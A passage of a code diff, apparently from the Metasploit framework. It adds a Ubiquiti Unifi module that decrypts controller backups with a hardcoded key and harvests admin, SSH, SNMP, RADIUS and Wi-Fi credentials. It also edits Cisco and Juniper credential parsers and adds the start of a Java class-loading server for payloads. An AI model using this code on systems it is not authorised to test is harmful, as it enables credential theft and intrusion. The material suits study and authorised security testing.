            print_good("#{thost}:#{tport} Username '#{user}' with Password: #{spass}")
-            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
-
            cred = credential_data.dup
            cred[:username] = user.to_s
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

          if stype == 7
            spass = cisco_ios_decrypt7(spass) rescue spass
            print_good("#{thost}:#{tport} Username '#{user}' with Decrypted Password: #{spass}")
-            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}_level#{priv}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
-
            cred = credential_data.dup
            cred[:username] = user.to_s
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -310,11 +278,9 @@ module Auxiliary::Cisco
          user  = $1
          spass = $2
          print_good("#{thost}:#{tport} ePhone Username '#{user}' with Password: #{spass}")
-          store_loot("cisco.ios.ephone.username_password", "text/plain", thost, "#{user}:#{spass}", "ephone_username_password.txt", "Cisco IOS ephone Username and Password")
          cred = credential_data.dup
          cred[:username] = user.to_s
          cred[:private_data] = spass
-          cred[:private_type] = :password
          create_credential_and_login(cred)

        when /^\s*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i
@@ -324,7 +290,6 @@ module Auxiliary::Cisco

          if stype == 5
            print_good("#{thost}:#{tport} Username '#{user}' with MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.username_password_hash", "text/plain", thost, "#{user}:#{spass}", "username_password_hash.txt", "Cisco IOS Username and Password Hash (MD5)")
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
            cred[:username] = user.to_s
@@ -335,39 +300,29 @@ module Auxiliary::Cisco

          if stype == 0
            print_good("#{thost}:#{tport} Username '#{user}' with Password: #{spass}")
-            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
-
            cred = credential_data.dup
            cred[:username] = user.to_s
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

          if stype == 7
            spass = cisco_ios_decrypt7(spass) rescue spass
            print_good("#{thost}:#{tport} Username '#{user}' with Decrypted Password: #{spass}")
-            store_loot("cisco.ios.username_password", "text/plain", thost, "#{user}:#{spass}", "username_password.txt", "Cisco IOS Username and Password")
-
            cred = credential_data.dup
            cred[:username] = user.to_s
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

        # https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/command/reference/cme_cr/cme_cr_chapter_010101.html#wp3722577363
        when /^\s*web admin (customer|system) name ([^\s]+) (secret [0|5]|password) ([^\s]+)/i
-          puts "GOTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT"
          login = $1
          suser = $2
          stype = $3
          spass = $4
-          puts stype.to_s
          if stype == 'secret 5'
            print_good("#{thost}:#{tport} Web Admin Username: #{suser} Type: #{login} MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.web_username_password_hash", "text/plain", thost, "#{suser}:#{spass}", "web_username_password_hash.txt", "Cisco IOS Web Username and Password Hash (MD5)")
-
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
            cred[:username] = suser.to_s
@@ -378,12 +333,9 @@ module Auxiliary::Cisco

          if stype == 'secret 0' || stype == 'password'
            print_good("#{thost}:#{tport} Web Username: #{suser} Type: #{login} Password: #{spass}")
-            store_loot("cisco.ios.web_username_password", "text/plain", thost, "#{suser}:#{spass}", "web_username_password.txt", "Cisco IOS Web Username and Password")
-
            cred = credential_data.dup
            cred[:username] = suser.to_s
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -395,8 +347,6 @@ module Auxiliary::Cisco

          if stype == 5
            print_good("#{thost}:#{tport} PPP Username #{suser} MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.ppp_username_password_hash", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password_hash.txt", "Cisco IOS PPP Username and Password Hash (MD5)")
-
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
            cred[:username] = suser.to_s
@@ -407,24 +357,18 @@ module Auxiliary::Cisco

          if stype == 0
            print_good("#{thost}:#{tport} PPP Username: #{suser} Password: #{spass}")
-            store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
-
            cred = credential_data.dup
            cred[:username] = suser.to_s
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

          if stype == 7
            spass = cisco_ios_decrypt7(spass) rescue spass
            print_good("#{thost}:#{tport} PPP Username: #{suser} Decrypted Password: #{spass}")
-            store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
-
            cred = credential_data.dup
            cred[:username] = suser.to_s
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

@@ -434,7 +378,6 @@ module Auxiliary::Cisco

          if stype == 5
            print_good("#{thost}:#{tport} PPP CHAP MD5 Encrypted Password: #{spass}")
-            store_loot("cisco.ios.ppp_password_hash", "text/plain", thost, spass, "ppp_password_hash.txt", "Cisco IOS PPP Password Hash (MD5)")
            cred = credential_data.dup
            cred[:jtr_format] = 'md5'
            cred[:private_data] = spass
@@ -444,22 +387,16 @@ module Auxiliary::Cisco

          if stype == 0
            print_good("#{thost}:#{tport} Password: #{spass}")
-            store_loot("cisco.ios.ppp_password", "text/plain", thost, spass, "ppp_password.txt", "Cisco IOS PPP Password")
-
            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end

          if stype == 7
            spass = cisco_ios_decrypt7(spass) rescue spass
            print_good("#{thost}:#{tport} PPP Decrypted Password: #{spass}")
-            store_loot("cisco.ios.ppp_password", "text/plain", thost, spass, "ppp_password.txt", "Cisco IOS PPP Password")
-
            cred = credential_data.dup
            cred[:private_data] = spass
-            cred[:private_type] = :password
            create_credential_and_login(cred)
          end
      end
@@ -33,6 +33,7 @@ module Auxiliary::Juniper
      workspace_id: myworkspace.id,
      origin_type: :service,
      service_name: '',
+      private_type: :nonreplayable_hash,
      module_fullname: self.fullname,
      status: Metasploit::Model::Login::Status::UNTRIED
    }
@@ -50,7 +51,6 @@ module Auxiliary::Juniper
      cred = credential_data.dup
      cred[:username] = admin_name
      cred[:private_data] = admin_hash
-      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
    end

@@ -70,7 +70,6 @@ module Auxiliary::Juniper
      cred[:username] = user_name
      cred[:jtr_format] = 'sha1'
      cred[:private_data] = user_hash
-      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
    end

@@ -111,7 +110,6 @@ module Auxiliary::Juniper
      cred[:private_data] = ppp_hash
      cred[:service_name] = 'PPTP'
      cred[:port] = 1723
-      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
    end

@@ -151,6 +149,7 @@ module Auxiliary::Juniper
      protocol: 'tcp',
      workspace_id: myworkspace.id,
      origin_type: :service,
+      private_type: :nonreplayable_hash,
      service_name: '',
      module_fullname: self.fullname,
      status: Metasploit::Model::Login::Status::UNTRIED
@@ -176,7 +175,6 @@ module Auxiliary::Juniper
      cred[:username] = 'root'
      cred[:jtr_format] = jtr_format
      cred[:private_data] = root_hash
-      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
    end

@@ -193,7 +191,6 @@ module Auxiliary::Juniper
      cred[:username] = user_name
      cred[:jtr_format] = jtr_format
      cred[:private_data] = user_hash
-      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
    end

@@ -225,7 +222,6 @@ module Auxiliary::Juniper
      cred[:port] = 1812
      cred[:protocol] = 'udp'
      cred[:private_data] = radius_hash
-      cred[:private_type] = :nonreplayable_hash
      cred[:service_name] = 'radius'
      create_credential_and_login(cred)
    end
@@ -239,7 +235,6 @@ module Auxiliary::Juniper
      cred[:private_data] = ppp_hash
      cred[:service_name] = 'pptp'
      cred[:port] = 1723
-      cred[:private_type] = :nonreplayable_hash
      create_credential_and_login(cred)
    end

@@ -22,6 +22,7 @@ require 'msf/core/auxiliary/rservices'
 require 'msf/core/auxiliary/cisco'
 require 'msf/core/auxiliary/juniper'
 require 'msf/core/auxiliary/brocade'
+require 'msf/core/auxiliary/ubiquiti'
 require 'msf/core/auxiliary/kademlia'
 require 'msf/core/auxiliary/llmnr'
 require 'msf/core/auxiliary/mdns'
@@ -0,0 +1,325 @@
+# -*- coding: binary -*-
+
+require 'metasploit/framework/hashes/identify'
+require 'bson'
+require 'zip'
+
+module Msf
+
+###
+#
+# This module provides methods for working with Ubiquiti equipment
+#
+###
+module Auxiliary::Ubiquiti
+  include Msf::Auxiliary::Report
+
+  def decrypt_unf(contents)
+    aes = OpenSSL::Cipher.new('aes-128-cbc')
+    aes.key = 'bcyangkmluohmars' # https://github.com/zhangyoufu/unifi-backup-decrypt/blob/master/E>
+    aes.padding = 0
+    aes.decrypt
+    aes.iv = 'ubntenterpriseap'
+    aes.update(contents)
+  end
+
+  def repair_zip(fname)
+    zip_exe = Msf::Util::Helper.which('zip')
+    if zip_exe.nil?
+      print_error('Zip utility not found.')
+      return nil
+    end
+    print_status('Attempting to repair zip file (this is normal and takes some time)')
+    temp_file = Rex::Quickfile.new("fixed_zip")
+    system("yes | #{zip_exe} -FF #{fname} --out #{temp_file.path}.zip > /dev/null")
+    return File.read("#{temp_file.path}.zip")
+  end
+
+  def extract_and_process_db(db_path)
+    f = nil
+    Zip::File.open(db_path) do |zip_file|
+      # Handle entries one by one
+      zip_file.each do |entry|
+        # Extract to file
+        if entry.name == 'db.gz'
+          print_status('extracting db.gz')
+          gz = Zlib::GzipReader.new(entry.get_input_stream)
+          f = gz.read
+          gz.close
+          break
+        end
+      end
+    end
+    f
+  end
+
+  def bson_to_json(byte_buffer)
+    # This function takes a byte buffer (db file from Unifi read in), which is a bson string
+    # it then converts it to JSON, where it uses the 'select collection' documents
+    # as keys.  For instance a bson that contained the follow (displayed in json
+    # for ease):
+    # {"__cmd"=>"select", "collection"=>"heatmap"}
+    # {'example'=>'example'}
+    # {'example2'=>'example2'}
+    # would become:
+    # {'heatmap'=>[{'example'=>'example'}, {'example2'=>'example2'}]}
+    # this is mainly done to ease the grouping of items for easy navigation later.
+
+    buf = BSON::ByteBuffer.new(byte_buffer)
+    output = {}
+    key = ''
+
+    while buf
+      begin
+        # read the document from the buffer
+        bson = BSON::Document.from_bson(buf)
+        if bson.has_key?('__cmd')
+          key = bson['collection']
+          output[key] = []
+          next
+        end
+        output[key] << bson
+      rescue RangeError
+        break
+      end
+    end
+    output
+  end
+
+  def unifi_config_eater(thost, tport, config)
+    # This is for the Ubiquiti Unifi files.  These are typically in the backup download zip file
+    # then in the db.gz file as db.  It is a MongoDB BSON file, which can be difficult to read.
+    # https://stackoverflow.com/questions/51242412/undefined-method-read-bson-document-for-bsonmodule
+    # The BSON file is a bunch of BSON Documents chained together.  There doesn't seem to be a good
+    # way to read these files directly, so looping through loading the content seems to work with
+    # minimal repercussions.
+
+    # The file format is broken into sections by __cmd select documents as such:
+    # {"__cmd"=>"select", "collection"=>"heatmap"}
+    # we can pull the relevant section name via the collection value.
+
+    creds_template = {
+      address: thost,
+      port: tport,
+      protocol: 'tcp',
+      workspace_id: myworkspace.id,
+      origin_type: :service,
+      private_type: :password,
+      service_name: '',
+      module_fullname: self.fullname,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }
+
+    report_host({
+      :host => thost,
+      :info => 'Ubiquiti Unifi Controller'
+    })
+
+    store_loot('unifi.json', 'application/json', thost, config.to_s.strip, 'unifi.json', 'Ubiquiti Unifi Configuration')
+
+    # Example BSON lines
+    # {"__cmd"=>"select", "collection"=>"admin"}
+    # {"_id"=>BSON::ObjectId('5c7f23af3825ce2067a1d9ce'), "name"=>"adminuser", "email"=>"admin@admin.com", "x_shadow"=>"$6$R4qnAaaF$AAAlL2t.fXu0aaa9z3uvcIm3ujbtJLhIO.lN1xZqHZPQoUAXs2BUTmI5UbuBo2/8t3epzbVLib17Ls7GCVx7V.", "time_created"=>1551825823, "last_site_name"=>"default", "ubic_name"=>"admin@admin.com", "ubic_uuid"=>"c23da064-3f4d-282f-1dc9-7e25f9c6812c", "ui_settings"=>{"dashboardConfig"=>{"lastActiveDashboardId"=>"2c7f2d213813ce2487d1ac38", "dashboards"=>{"3c7f678a3815ce2021d1d9c7"=>{"order"=>1}, "5b4f2d269115ce2087d1abb9"=>{}}}}}
+    def process_admin(lines, credential_data)
+      lines.each do |line|
+        admin_name = line['name']
+        admin_email = line['email']
+        admin_password_hash = line['x_shadow']
+        print_good("Admin user #{admin_name} with email #{admin_email} found with password hash #{admin_password_hash}")
+        cred = credential_data.dup
+        cred[:username] = admin_name
+        cred[:private_data] = admin_password_hash
+        cred[:private_type] = :nonreplayable_hash
+        create_credential_and_login(cred)
+      end
+    end
+
+    # Example BSON lines
+    # {"__cmd"=>"select", "collection"=>"firewallrule"}
+    # {"_id"=>BSON::ObjectId('5c7f23af3825ce2067a1d9ce'), "ruleset" => "WAN_OUT", "rule_index" => "2000", "name" => "Block Example", "enabled" => true, "action" => "reject", "protocol_match_excepted" => false, "logging" => false, "state_new" => false, "state_established" => false, "state_invalid" => false, "state_related" => false, "ipsec" => "", "src_firewallgroup_ids" => ["1a1c15a11111ce14b1f1111a"], "src_mac_address" => "", "dst_firewallgroup_ids" => [], "dst_address" => "", "src_address" => "", "protocol" => "all", "icmp_typename" => "", "src_networkconf_id" => "", "src_networkconf_type" => "NETv4", "dst_networkconf_id" => "", "dst_networkconf_type" => "NETv4", "site_id" => "1c1f208b3815ce1111a1a1a1"}
+    def process_firewallrule(lines, _)
+      lines.each do |line|
+        rule = "#{line['action']}"
+        unless line['dst_address'].empty?
+          rule << " dst addresses: #{line['dst_address']}"
+        end
+        unless line['dst_firewallgroup_ids'].empty?
+          rule << " dst group: #{line['dst_firewallgroup_ids'].join(', ')}"
+        end
+        unless line['src_address'].empty?
+          rule << " src addresses: #{line['src_address']}"
+        end
+        unless line['src_firewallgroup_ids'].empty?
+          rule << " src group: #{line['src_firewallgroup_ids'].join(', ')}"
+        end
+        rule << " protocol: #{line['protocol']}"
+
+        print_status("#{line['enabled'] ? 'Enabled' : 'Disabled'} Firewall Rule '#{line['name']}': #{rule}")
+      end
+    end
+
+    # Example BSON lines
+    # {"__cmd"=>"select", "collection"=>"radiusprofile"}
+    # {"_id"=>BSON::ObjectId('2c7a318c38c5ce2f86d179cb'), "attr_no_delete"=>true, "attr_hidden_id"=>"Default", "name"=>"Default", "site_id"=>"3c7f226b2315be2087a1d5b2", "use_usg_auth_server"=>true, "auth_servers"=>[{"ip"=>"192.168.0.1", "port"=>1812, "x_secret"=>""}], "acct_servers"=>[]}
+    def process_radiusprofile(lines, credential_data)
+      lines.each do |line|
+        line['auth_servers'].each do |server|
+          report_service(
+            host: server['ip'],
+            port: server['port'],
+            name: 'radius',
+            proto: 'udp'
+          )
+          if server['x_secret'] # no need to output if the secret is blank, therefore its not configured
+            print_good("Radius server: #{server['ip']}:#{server['port']} with secret '#{server['x_secret']}'")
+            cred = credential_data.dup
+            cred[:username] = ''
+            cred[:private_data] = server['x_secret']
+            cred[:address] = server['ip']
+            cred[:port] = server['port']
+            create_credential_and_login(cred)
+          end
+        end
+      end
+    end
+
+    # settings has multiple items we care about:
+    #   x_mesh_essid/x_mesh_psk -> should contain the mesh network wifi name and password
+    #   ntp -> ntp servers
+    #   x_ssh_username/x_ssh_password/x_ssh_keys/x_ssh_sha512passwd
+
+    # Example lines
+    # {"__cmd"=>"select", "collection"=>"setting"}
+    # {"_id"=>BSON::ObjectId('3c3e21ac3715ce20a721d9ba'), "site_id"=>"3c2f215b3825ca2087c1dfb6", "key"=>"ntp", "ntp_server_1"=>"0.ubnt.pool.ntp.org", "ntp_server_2"=>"1.ubnt.pool.ntp.org", "ntp_server_3"=>"2.ubnt.pool.ntp.org", "ntp_server_4"=>"3.ubnt.pool.ntp.org"}
+    # {"_id"=>BSON::ObjectId('3c3e21ac3715ce20a721d9bb'), "site_id"=>"3c2f215b3825ca2087c1dfb6", "key"=>"mgmt", "advanced_feature_enabled"=>false, "x_ssh_enabled"=>true, "x_ssh_bind_wildcard"=>false, "x_ssh_auth_password_enabled"=>true, "unifi_idp_enabled"=>true, "x_mgmt_key"=>"ba6cbe170f8276cd86b24ac79ab29afc", "x_ssh_username"=>"admin", "x_ssh_password"=>"16xoB6F2UyAcU6fP", "x_ssh_keys"=>[], "x_ssh_sha512passwd"=>"$6$R4qnAaaF$AAAlL2t.fXu0aaa9z3uvcIm3ujbtJLhIO.lN1xZqHZPQoUAXs2BUTmI5UbuBo2/8t3epzbVLib17Ls7GCVx7V."}
+    # {"_id"=>BSON::ObjectId('3c3e21ac3715ce20a721d9bc'), "site_id"=>"3c2f215b3825ca2087c1dfb6", "key"=>"connectivity", "enabled"=>true, "uplink_type"=>"gateway", "x_mesh_essid"=>"vwire-851237d214c8c6ba", "x_mesh_psk"=>"523a9b872b4624c7894f96c3ae22cdfa"}
+    # {"_id"=>BSON::ObjectId('3c3e21ac3715ce20a721d9bd'), "site_id"=>"3c2f215b3825ca2087c1dfb6", "key"=>"snmp", "community": "public", "enabled": true, "enabledV3": true, "username": "usernamesnmpv3", "x_password": "passwordsnmpv3"}
+    def process_setting(lines, credential_data)
+      lines.each do |line|
+        case line['key']
+        when 'snmp'
+          cred = credential_data.dup
+          cred[:protocol] = 'udp'
+          cred[:port] = 161
+          cred[:service_name] = 'snmp'
+          unless line['community'].blank?
+            cred[:private_data] = line['community']
+            create_credential_and_login(cred)
+            print_good("SNMP v2 #{line['enabled'] ? 'enabled' : 'disabled'} with password #{line['community']}")
+          end
+          unless line['x_password'].blank? || line['username'].blank?
+            cred[:username] = line['username']
+            cred[:private_data] = line['x_password']
+            create_credential_and_login(cred)
+            print_good("SNMP v3 #{line['enabledV3'] ? 'enabled' : 'disabled'} with username #{line['username']} password #{line['x_password']}")
+          end
+        when 'connectivity'
+          cred = credential_data.dup
+          cred[:username] = line['x_mesh_essid']
+          cred[:private_data] = line['x_mesh_psk']
+          create_credential_and_login(cred)
+          print_good("Mesh Wifi Network #{line['x_mesh_essid']} password #{line['x_mesh_psk']}")
+        when 'ntp'
+          ['ntp_server_1', 'ntp_server_2', 'ntp_server_3', 'ntp_server_4'].each do |ntp|
+            unless line[ntp].empty? || line[ntp].ends_with?('ubnt.pool.ntp.org')
+              report_service(
+                host: line[ntp],
+                port: '123',
+                name: 'ntp',
+                proto: 'udp'
+              )
+              print_good("NTP Server: #{line[ntp]}")
+            end
+          end
+        when 'mgmt'
+          admin_name = line['x_ssh_username']
+          admin_password_hash = line['x_ssh_sha512passwd']
+          admin_password = line['x_ssh_password']
+          print_good("SSH user #{admin_name} found with password #{admin_password} and hash #{admin_password_hash}")
+          cred = credential_data.dup
+          cred[:username] = admin_name
+          cred[:private_data] = admin_password_hash
+          cred[:private_type] = :nonreplayable_hash
+          login = create_credential_and_login(cred)
+          if login.present? && admin_password.present?
+            create_cracked_credential(username: admin_name, password: admin_password, core_id: login.core.id)
+          end
+          line['x_ssh_keys'].each do |key|
+            print_good("SSH user #{admin_name} found with SSH key: #{key}")
+          end
+        end
+      end
+    end
+
+    # Example lines
+    # {"__cmd"=>"select", "collection"=>"wlanconf"}
+    # {"_id"=>BSON::ObjectId('3c3e21ac3715ce20a721d9ba'), "enabled" => true, "security" => "wpapsk", "wep_idx" => 1, "wpa_mode" => "wpa2", "wpa_enc" => "ccmp", "usergroup_id" => "5a7f111a3815ce1111a1d1c3", "dtim_mode" => "default", "dtim_ng" => 1, "dtim_na" => 1, "minrate_ng_enabled" => false, "minrate_ng_advertising_rates" => false, "minrate_ng_data_rate_kbps" => 1000, "minrate_ng_cck_rates_enabled" => true, "minrate_na_enabled" => false, "minrate_na_advertising_rates" => false, "minrate_na_data_rate_kbps" => 6000, "mac_filter_enabled" => false, "mac_filter_policy" => "allow", "mac_filter_list" => [], "bc_filter_enabled" => false, "bc_filter_list" => [], "group_rekey" => 3600, "name" => "ssid_name", "x_passphrase" => "supersecret", "wlangroup_id" => "5c7f208c3815ce2087d1d9c4", "schedule" => [], "minrate_ng_mgmt_rate_kbps" => 1000, "minrate_na_mgmt_rate_kbps" => 6000, "minrate_ng_beacon_rate_kbps" => 1000, "minrate_na_beacon_rate_kbps" => 6000, "site_id" => "5c7f208b3815ce2087d1d9b6", "x_iapp_key" => "d11a1c86df1111be86aaa69e8aa1c57f", "no2ghz_oui" => true}
+    def process_wlanconf(lines, credential_data)
+      lines.each do |line|
+        ssid = line['name']
+        mode = line['security']
+        password = line['x_passphrase']
+        cred = credential_data.dup
+        cred[:username] = ssid
+        cred[:private_data] = password
+        create_credential_and_login(cred)
+        print_good("#{line['enabled'] ? 'Enabled' : 'Disabled'} wifi #{ssid} on #{mode}(#{line['wpa_mode']},#{line['wpa_enc']}) has password #{password}")
+      end
+    end
+
+    # Example lines
+    # {"__cmd"=>"select", "collection"=>"firewallgroup"}
+    # {"_id"=>BSON::ObjectId('3c3e21ac3715ce20a721d9ba'), "name" => "Cameras", "group_type" => "address-group", "group_members" => ["1.1.1.1"], "site_id" => "5c7f111b3815ce208aaa111a"}
+    def process_firewallgroup(lines, _)
+      lines.each do |line|
+        print_status("Firewall Group: #{line['name']}, group type: #{line['group_type']}, members: #{line['group_members'].join(', ')}")
+      end
+    end
+
+    # Example lines
+    # {"__cmd"=>"select", "collection"=>"device"}
+    # {"_id"=>BSON::ObjectId('3c3e21ac3715ce20a721d9ba'), "ip" => "5.5.5.5", "mac" => "cc:cc:cc:cc:cc:cc", "model" => "UGW3", "type" => "ugw", "version" => "4.4.44.5213844", "adopted" => true, "site_id" => "5aaaaaabaaaaae1117d1d1b6", "x_authkey" => "eaaaaaaa63e59ab89c111e11d6e11aa1", "cfgversion" => "aaa4b11b1df1a111", "config_network" => {"type" => "dhcp", "ip" => "1.1.1.1"}, "license_state" => "registered", "two_phase_adopt" => false, "unsupported" => false, "unsupported_reason" => 0, "x_fingerprint" => "aa:aa:11:aa:11:11:11:11:11:11:11:11:11:11:11:11", "x_ssh_hostkey" => "MIIBIjANBgkAhkiG9w0AAQEFAAOCAQ8AMIIBCgKCAQEAAU4S/7r548xvtGuHlgAAAKzkrL+t97ZWAZru8wQFbltEB4111HiIAkzt041td8V+P7c1bQtn3YQdViAuH2h2sgt8feAvMWo56OskAoDvHwAEv5AWqmPKy/xmKbdfgA5wTzvSztPGFA4QuOuA1YxQICf1MgpoOtplAAA31JxAYF/t7n8qgvJlm1JRv2AAAZHHtSiz1IaxzOO9LAAAqCfHvHugPcZYk2yAAAP7JrnnR1fAVj9F4aaYaA0eSjvDTAglykXHCbh1EWAAAecqHZ/SWn9cjmuAAArZxxG6m6Eu/aj9we82/PmtKzQGN0RWUsgrxajQowtNpVsNTnaOglUsfQIDAAAA", "x_ssh_hostkey_fingerprint" => "11:11:11:11:11:11:11:11:11:11:11:11:11:11:11:11", "inform_url" => "http://1.1.2.2:8080/inform", "inform_ip" => "1.1.1.1", "serial" => "AAAAAAAAAAAA", "required_version" => "4.0.0", "ethernet_table" => [{ "mac" => "b4:fb:e4:cc:cc:cc", "num_port" => 1, "name" => "eth0"}, {"mac" => "b4:fb:e4:bb:bb:bb", "num_port" => 1, "name" => "eth1"}, {"mac" => "b4:fb:e4:aa:aa:aa", "num_port" => 1, "name" => "eth2"}], "fw_caps" => 184323, "hw_caps" => 0, "usg_caps" => 786431, "board_rev" => 16, "x_aes_gcm" => true, "ethernet_overrides" => [{"ifname" => "eth1", "networkgroup" => "LAN"}, {"ifname" => "eth0", "networkgroup" => "WAN"}], "led_override" => "default", "led_override_color" => "#0000ff", "led_override_color_brightness" => 100, "outdoor_mode_override" => "default", "name" => "USG", "map_id" => "1a111c2e1111ce2087d1e199", "x" => -22.11111198630405, "y" => -41.1111113859866, "heightInMeters" => 2.4}
+    def process_device(lines, _)
+      lines.each do |line|
+        report_host({
+         :host => line['ip'],
+         :name => line['name'],
+         :mac => line['mac'],
+         :os_name => 'Ubiquiti Unifi'
+        })
+        print_good("Unifi Device #{line['name']} of model #{line['model']} on #{line['ip']}")
+      end
+    end
+
+    # Example lines
+    # {"__cmd"=>"select", "collection"=>"user"}
+    # {"_id"=>BSON::ObjectId('3c3e21ac3715ce20a721d9ba'), "mac" => "00:0c:29:11:aa:11", "site_id" => "5c7f111b1111aa2087d11111", "oui" => "Vmware", "is_guest" => false, "first_seen" => 1551111161, "last_seen" => 1561621747, "is_wired" => true, "hostname" => "android", "usergroup_id" => "", "name" => "example device", "noted" => true, "use_fixedip" =>  true, "network_id" => "1c7f111a1115aa2087aaa9aa", "fixed_ip" => "7.7.7.7"}
+    def process_user(lines, _)
+      lines.each do |line|
+        host_hash = {
+         :name => line['hostname'],
+         :mac => line['mac']
+        }
+        desc = "#{line['hostname']} (#{line['mac']})"
+        if line['fixed_ip'] 
+          host_hash[:host] = line['fixed_ip']
+          desc << " on IP #{line['fixed_ip']}"
+        end
+        if line['name'] 
+          host_hash[:info] = line['name']
+          desc << " with name #{line['name']}"
+        end
+        report_host(host_hash)
+        print_good("Network Device #{desc} found")
+      end
+    end
+
+    # here is where we actually process the file
+    config.each do |key,value|
+      next unless self.respond_to?("process_#{key}")
+      credential_data = creds_template.dup
+      self.send("process_#{key}", value, credential_data)
+    end
+  end
+end
+end
@@ -31,13 +31,13 @@ module Exploit::Remote::AutoCheck
      print_warning(checkcode.message)
    when Exploit::CheckCode::Safe
      fail_with(Module::Failure::NotVulnerable,
-                "#{checkcode.message}. Disable AutoCheck to override.")
+                "#{checkcode.message} Disable AutoCheck to override.")
    when Exploit::CheckCode::Unsupported
      fail_with(Module::Failure::BadConfig,
-                "#{checkcode.message}. Disable AutoCheck to override.")
+                "#{checkcode.message} Disable AutoCheck to override.")
    else
      fail_with(Module::Failure::Unknown,
-                "#{checkcode.message}. Disable AutoCheck to override.")
+                "#{checkcode.message} Disable AutoCheck to override.")
    end
  end

@@ -24,22 +24,22 @@ module Exploit::Remote::CheckModule

    # Bail if we couldn't
    unless mod
-      return CheckCode::Unsupported(
-        "Could not instantiate #{check_module}"
+      return Exploit::CheckCode::Unsupported(
+        "Could not instantiate #{check_module}."
      )
    end

    # Bail if it isn't aux
    if mod.type != Msf::MODULE_AUX
-      return CheckCode::Unsupported(
-        "#{check_module} is not an auxiliary module"
+      return Exploit::CheckCode::Unsupported(
+        "#{check_module} is not an auxiliary module."
      )
    end

    # Bail if run isn't defined
    unless mod.respond_to?(:run)
-      return CheckCode::Unsupported(
-        "#{check_module} does not define a run method"
+      return Exploit::CheckCode::Unsupported(
+        "#{check_module} does not define a run method."
      )
    end

@@ -64,7 +64,7 @@ module Exploit::Remote::CheckModule
      # Bail if module doesn't return a CheckCode
      unless checkcode.kind_of?(Exploit::CheckCode)
        return Exploit::CheckCode::Unsupported(
-          "#{check_module} does not return a CheckCode"
+          "#{check_module} does not return a CheckCode."
        )
      end

@@ -73,7 +73,7 @@ module Exploit::Remote::CheckModule
    else
      # Bail if module doesn't return a CheckCode
      Exploit::CheckCode::Unsupported(
-        "#{check_module} does not return a CheckCode"
+        "#{check_module} does not return a CheckCode."
      )
    end
  end
@@ -15,6 +15,7 @@ module Http
  end

  def start_service(opts = {})
+    # XXX: This is a workaround until we can take SSL in opts
    datastore_ssl = datastore['SSL']
    datastore['SSL'] = !!opts[:ssl]

@@ -33,7 +34,7 @@ module Http
      client << " (#{user_agent})"
    end

-    print_status("Client #{client} requested #{request.raw_uri}")
+    print_status("Client #{client} requested #{request.uri}")

    if stager_instance.respond_to?(:user_agent)
      agent_regex = stager_instance.user_agent
@@ -43,7 +44,7 @@ module Http

    if user_agent =~ agent_regex
      print_status("Sending payload to #{client}")
-      send_response(cli, exe)
+      send_response(cli, self.exe)
    else
      print_status("Sending 404 to #{client}")
      send_not_found(cli)
@@ -6,7 +6,7 @@

 require 'expect'

-module Msf::Exploit::Expect
+module Msf::Exploit::Remote::Expect

  # Send a line and expect a pattern
  #
@@ -16,6 +16,7 @@
 require 'msf/core'
 require 'msf/core/exploit/java/rmi/util'
 require 'msf/core/exploit/java/rmi/client'
+require 'msf/core/exploit/java/http/classloader'

 module Msf
 module Exploit::Java
@@ -0,0 +1,123 @@
+# -*- coding: binary -*-
+
+#
+# This mixin implements the remote loading of Java classes over HTTP
+#
+
+module Msf::Exploit::Remote::Java::HTTP
+module ClassLoader
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Stance' => Msf::Exploit::Stance::Aggressive
+    ))
+
+    deregister_options('URIPATH')
+  end
+
+  def start_service(opts = {})
+    # XXX: This is a workaround until we can take SSL in opts
+    ssl = datastore['SSL']
+    datastore['SSL'] = false
+
+    super(opts.merge('Path' => '/'))
+
+    classloader_uri = get_uri
+    datastore['SSL'] = ssl
+
+    classloader_uri
+  end
+
+  def on_request_uri(cli, request)
+    vprint_status("#{request.method} #{request.uri} requested")
+
+    unless %w[HEAD GET].include?(request.method)
+      vprint_error("Ignoring #{request.method} request")
+      return
+    end
+
+    if request.method == 'HEAD'
+      whitelist = %W[
+        /#{class_name}.class
+        /metasploit/Payload.class
+        /metasploit.dat
+      ]
+
+      unless whitelist.include?(request.uri)
+        vprint_error('Sending 404')
+        return send_not_found(cli)
+      end
+
+      vprint_good('Sending 200')
+      return send_response(cli, '')
+    end
+
+    case request.uri
+    # Stage 1
